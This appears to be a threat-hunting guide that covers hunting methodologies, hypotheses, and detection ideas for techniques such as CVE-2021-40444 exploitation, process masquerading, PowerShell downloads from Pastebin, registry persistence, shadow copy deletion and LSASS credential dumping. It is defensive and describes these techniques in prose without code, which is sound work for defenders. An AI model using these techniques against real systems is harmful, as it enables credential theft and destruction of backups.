Hunting
Threat hunting is often referred to as a semi-scientific practice. This is because hunters will deploy hunts based on a hypothesis, collect evidence, and document their findings — all of which should stir (hopefully) fond memories of grade 9 science class. And just like in high school, the hardest part of the scientific process (and threat hunting) is often coming up with an idea to test scientifically.
Threat hunting must be iterative. A hunt (the commonly accepted term for activity carried out by these teams) has value in its execution, but only for the duration of its execution. Once the hunt is complete, any subsequent malicious activity may remain unidentified. Therefore, hunts need to be carried out in an iterative fashion based on the prevalence of the technique, and the relative risk to the organization.
Threat hunting must be proactive. The objective of threat hunting is, ultimately, to identify previously undetected malicious activity in an environment. This objective is accomplished through a variety of analysis methods, especially those involving behavioral and statistical analysis. This process, however, absolutely does not rely on searching through an environment using atomic indicators of compromise (IOC). That practice belongs strictly to the domain of traditional security operations, not threat hunting.
Hunting Methodologies
Threat hunters assume that adversaries are already in the system, and they initiate investigation to find unusual behavior that may indicate the presence of malicious activity. In proactive threat hunting, this initiation of investigation typically falls into three main categories:
Hypothesis-driven investigation
Hypothesis-driven investigations are often triggered by a new threat that’s been identified through a large pool of crowdsourced attack data, giving insights into attackers’ latest tactics, techniques, and procedures (TTP). Once a new TTP has been identified, threat hunters will then look to discover if the attacker’s specific behaviors are found in their own environment.
Investigation based on known Indicators of Compromise or Indicators of Attack
This approach to threat hunting involves leveraging tactical threat intelligence to catalog known IOCs and IOAs associated with new threats. These then become triggers that threat hunters use to uncover potential hidden attacks or ongoing malicious activity.
Advanced analytics and machine learning investigations
The third approach combines powerful data analysis and machine learning to sift through a massive amount of information in order to detect irregularities that may suggest potential malicious activity. These anomalies become hunting leads that are investigated by skilled analysts to identify stealthy threats.
All three approaches are a human-powered effort that combines threat intelligence resources with advanced security technology to proactively protect an organization’s systems and information.
Threat Hunting Steps
The process of proactive cyber threat hunting typically involves three steps: a trigger, an investigation and a resolution.
Step 1: The Trigger
A trigger points threat hunters to a specific system or area of the network for further investigation when advanced detection tools identify unusual actions that may indicate malicious activity. Often, a hypothesis about a new threat can be the trigger for proactive hunting. For example, a security team may search for advanced threats that use tools like fileless malware to evade existing defenses.
Step 2: Investigation
During the investigation phase, the threat hunter uses technology such as EDR (Endpoint Detection and Response) to take a deep dive into potential malicious compromise of a system. The investigation continues until either the activity is deemed benign or a complete picture of the malicious behavior has been created.
Step 3: Resolution
The resolution phase involves communicating relevant malicious activity intelligence to operations and security teams so they can respond to the incident and mitigate threats. The data gathered about both malicious and benign activity can be fed into automated technology to improve its effectiveness without further human intervention.
Throughout this process, cyber threat hunters gather as much information as possible about an attacker’s actions, methods and goals. They also analyze collected data to determine trends in an organization’s security environment, eliminate current vulnerabilities and make predictions to enhance security in the future.
What is a Hunting Hypothesis?
Before we dive into list though, first we need to answer the question “what is a threat hunting hypothesis?”
A hypothesis is a “…tentative assumption made in order to draw out and test its logical or empirical consequences.” Therefore a threat hunting hypothesis is fairly similar in that it is a proposition regarding a tactic, technique, or procedure, often derived from threat intelligence, security research, or an individual hunter’s experience or intuition, which is then tentatively assumed to be correct until a hunt can be carried out to either conclusively prove or disprove its validity.
While there is no set “format” for a threat hunting hypothesis to take, many hunters will try and keep a standard format for their hunts.
Hunting Ideas
#1: LOOK FOR EXPLOITATION OF HIGH VALUE VULNERABILITIES
One of the easiest threat hunting ideas is to simply look for behaviors that align with active exploitation of high profile or high value vulnerabilities. This is because adversaries will often rely very heavily on specific vulnerabilities that they know how to exploit proficiently. A Great example of this is CVE-2021–40444:
MICROSOFT WORD LAUNCHING CONTROL PANEL PROCESS — POTENTIAL CVE-2021–40444 EXPLOIT
Microsoft Word suffered from a ZeroDay attack in September 2021, tracked as CVE-2021–40444. The vulnerability allowed code execution by Microsoft Word without the need of a macro to run. A malicious Word document containing a configuration to load malicious code from a website allowed an attack to download and execute a payload without user interaction after the document is opened. The exploit observed in the wild utilized the Control Panel executable (control.exe) to load DLL files masked as INF files from one of several directories. This is abnormal behavior as these commands are typically related to installing file system filter drivers and is not common for Microsoft Word to perform.
#2: LOOK FOR MASQUERADING
Another quick win that hunt teams can focus on is to look for masquerading. Most often adversaries and malware are going to try and blend in with the background activity on their compromised system. This means that they may try to masquerade their processes by using legitimate sounding process names. A common example that has been used widely is Microsoft Defender.
PROCESS MASQUERADING AS MICROSOFT MALWARE PROTECTION ENGINE
The Microsoft Malware Protection engine resides in the C:\Program Files\Windows Defender\ or C:\ProgramData\Microsoft\Windows Defender\ folders. All legitimate executions of the application should be spawned from these locations. This package identifies any outliers that are not executed from these normal folders, indicating a process is masquerading as the legitimate Microsoft Malware Protection Engine.
#3: LOOK FOR SUSPICIOUS USE OF ONLINE SERVICES
Another high-fidelity threat hunting idea can be to look for suspicious activity relating to the use of suspicious or prohibited online services. These services are often used to help an actor infiltrate an environment with their tools, but they can also be used as a method of data exfiltration as well.
DROPBOX API USAGE — ATTEMPTED DOWNLOAD/UPLOAD
Identify the usage of DropBox’s HTTP API via URL string. While the DropBox API may be very common, observing an upload/download of a PDF file from a temp directory specifically could be indicative of activity related to Nobelium (UNC2452) reported in May 2021. Nobelium’s BoomBox downloader utilized the DropBox API over HTTP to send machine information and download another payload which is then saved to a folder within the user’s AppData directory and launched with rundll32.exe.
POWERSHELL PASTEBIN DOWNLOAD
This threat abuses Powershell commands to potentially download and execute code hosted on normally benign sources such as Pastebin, Github, and services that are similar in offering. This particular method has been utilized by the REvil ransomware campaign and is a method of malware distribution that can be obfuscated with the trust given to well-known sites.
#4: LOOK FOR SUSPICIOUS USE OF THE REGISTRY
A great place to start a hunt is by looking at the registry. A lot of adversaries and malware use the registry for persistence, especially the CurrentVersion registry key. If you are looking for evidence of adversarial activity, the Windows Registry is a great place to start.
ATTEMPTED VBSCRIPT STORED IN NON-RUN CURRENTVERSION REGISTRY KEY VALUE
Identify potential new registry key name that is a non-autorun and non-run key in the HKLM\Software\Microsoft\Windows\CurrentVersion\ registry key containing VBScript in the key value. The Windows Registry is a database of settings used by Microsoft Windows system applications and core utilities. The registry of often abused by adversaries to either store configuration information, hide code, evade detection, inhibit system function, establish persistence among other reasons. The “CurrentVersion” registry key in either HKCU (Current User) or the HKLM (Local Machine) hives is one of the most abused registry keys, more specifically the Run key within CurrentVersion. Because of this the Run key is heavily scrutinized by detection and prevention tools. The targeted technique in this package utilizes only the CurrentVersion key to add the malware’s configuration information and potentially establish persistence. This is most likely due to the Run key’s heavy scrutiny by defense tools.
#5: LOOK FOR SUSPICIOUS BEHAVIORS
It may sound a bit like a tautology, but another great way to start hunting is to look for suspicious behaviors. Things like excessive file writes or file modifications can be a give-away for ransomware activity on a system. You can also look for files with highly unusual file extensions.
EXCESSIVE FILE WRITE OR MODIFICATIONS WITH COMMON RANSOMWARE NOTE EXTENSIONS
Ransomware notes are generally known to be dropped in common paths, such as a user’s Desktop so they are more visible; using image files, .txt files and/or .doc files to act as the platform to communicate. Attackers will also leave these ransomware notes in every folder or directory they choose to encrypt. This threat focuses on these notes being dropped excessively, which potentially is indicative of Ransomware activity.
Multiple Ransomware variants drop a Ransom note in each folder it encrypts, once its encrypted all the files within the folder. The logic provided will look for the common file extensions utilized by Ransomware for their notes and set a threshold of at least 20 unique folders where the same file is created or modified.
#6: LOOK FOR SUSPICIOUS BEHAVIORS INVOLVING LOLBINS
One of the biggest trends amongst adversaries these days is their growing use of so-called “living-off-the-land” binaries (or LOLBins). These allow actors to carry out activities while avoiding detection by various security platforms through the use of native Windows applications. One example of this is using built-in utilities to delete volume shadow copies (or VSC) in order to prevent restoration.
SHADOW COPIES DELETION USING OPERATING SYSTEMS UTILITIES
Volume Shadow Copy Service is a framework provided in Microsoft Windows operating systems to perform volume backups or for creating consistent, point-in-time copies of data (known as shadow copies). Due to the features that Volume Shadow Copies provide, such as the ability to rollback to a specific point-in-time copy of an NTFS volume, the copies are often targeted by malware. Nearly every Ransomware variant ensures destruction of Volume Shadow Copy (VSC) backups, so that the infected user cannot easily restore their encrypted files. Similarly, the Volume Shadow Copy (VSC) backups have also been observe being targeted by Wiper malware variants (such as the “Olympic Destroyer” malware, which targeted the 2018 Winter Olympics in PyeongChang, South Korea), as well as Loader malware variants (such as the H1N1 Trojan Downloader).
#7 — Potential Maldoc Execution Chain
Level of Complexity: Easy
Hypothesis: Maldocs (Malware Documents) are malicious documents containing self-executing code or code that requires a user to grant permission or interact with the document before execution. Maldocs are mostly delivered to users via phishing emails. In many cases the user will be required to interact with the document prior to any code executing successfully. Once the document is opened and any required user interaction has been performed, malicious code will execute, such as PowerShell, cmd shell or similar scripting code to establish communication with the attacker’s infrastructure, download a payload or perform local actions such as persistence or sleep until a later time.
#8 — PowerShell Encoded Command Execution
Level of Complexity: Easy
Hypothesis: Once a moderately skilled attacker has gained initial access to a system, they are likely to employ tools that reside on the system to carry out their attack, or to use as a means of ingress for other tools. This is because these native tools are less likely to be caught by traditional treat detection platforms, and their use is unlikely to raise much attention. This is especially true for tools such as PowerShell that enable an attacker to carry out a number of attacks. In an effort to further obfuscate their PowerShell activity, attackers will likely use the EncodedCommand function to encode commands and arguments and prevent simple string matching. Presence of the EncodedCommand PowerShell tool should be investigated.
#9 — Attempted VBScript Stored in Non-Run CurrentVersion Registry Key Value
Level of Complexity: Medium
The Windows Registry is a database of settings used by Microsoft Windows system applications and core utilities. The registry of often abused by adversaries to either store configuration information, hide code, evade detection, inhibit system function, establish persistence among other reasons. The “CurrentVersion” registry key in either HKCU (Current User) or the HKLM (Local Machine) hives is one of the most abused registry keys, more specifically the Run key within CurrentVersion. Because of this the Run key is heavily scrutinized by detection and prevention tools. The targeted technique in this package utilizes only the CurrentVersion key to add the malware’s configuration information and potentially establish persistence. This is most likely due to the Run key’s heavy scrutiny by defense tools.
#10 — Cobalt Strike Beacon Default C2 Structure
Level of Complexity: Medium
Cobalt Strike is a fully-featured and commercially available penetration testing tool offered by Washington, DC-based Strategic Cyber LLC. The tool is advertised for “Adversary Simulations and Red Team Operations” however its significant customization and capabilities have led to its use by a wide variety of threat actors for a variety of motivations. Adversaries employing Cobalt Strike will often use its Beacon component during the efforts to gain initial access. The beacon component, by default, uses a default command and control (C2) structure via DNS queries. Adversaries that are not highly familiar with Cobalt Strike may neglect to customize the C2 structure.
#11 — LSASS Memory Dumping using WerFault.exe
Level of Complexity: Medium
Local Security Authority Subsystem Service (LSASS) is a process within Windows operating systems that is responsible for the enforcement of various security policies on a system, including verification of user logins. Once a user logs in to the system, it will generate and store credentials within the memory of the lsass.exe process. These credentials can be obtained by adversaries through various means, such as creating a memory dump of the process, which can then be used to perform lateral movement, privilege escalation, and various other attack methodologies.
Structured vs Unstructured Threat Hunting
Threat hunting is one of the most powerful capabilities an organization can have. It enables identification of new and emerging threats in an environment. Often long before other more reactive security tools. This reduces not only the mean-time-to-detection (MTTD), and the attacker’s dwell time, but also the potential harm to data and systems. Despite this, organizations continue to struggle integrating threat hunting into their security operations. This challenge often starts with understanding the types of threat hunting, and how, and where, to use them.
Structured
Structured hunting, otherwise known as hypothesis-based hunting, is a category that is based on a central hypothesis about attackers and their associated tactics, techniques, and procedures (TTP). Unlike the Hypothesis phase of the Threat Hunting Cycle, hypothesis-based hunting is developed strictly around a scientific hypothesis, that is a formal statement which must be falsifiable, and is often driven by organizations’ threat intelligence capabilities, but may also be informed by a hunter’s skillset and experience.
Unstructured
Unstructured hunting, often referred to as data-based hunting, is a category which is not based on a central hypothesis but rather on observable data.
Hunting Tactics
There are a number of tactics that threat hunters use for both structured and unstructured hunting. While this list is not exhaustive, it is meant to provide some insight into tactics threat hunters often use in their hunts. Note that none of these tactics are exclusive, and several can, and should, be used in tandem as seen in the TaHiTI methodology.
Intelligence Driven
Intelligence-driven hunting is a tactic used in structured hunting whereby hunters use reporting from internal and external threat intelligence providers in order to develop a hypothesis.vii This type of hunting will rely very heavily on the quality of intelligence reporting generated and consumed by organizations. When a new vulnerability or attack technique is released, threat intelligence reporting will document the attack, and that will often form the basis for a new hypothesis.
Target Driven
Target-driven hunting is a tactic that acknowledges that hunters have both limited time and resources, and that while attackers may gain access through a number of avenues, their ultimate targets are often similar: specific networking infrastructure and large data repositories.viii Therefore, when reviewing hunt plans, for organizations with limited resources, these targets should be prioritized.
Technique Driven
Technique-driven hunting is a tactic for hunting that seeks to concentrate on one, or a series of, techniques that attackers are likely to employ.ix These techniques are often, but not always, derived from the MITRE ATT&CK framework, and seek to uncover all usage of that technique in the environment, regardless of whether it is legitimate or not. This tactic relies heavily on threat hunters’ skills and experience with the various operating systems within the environment.
Resources
Last updated
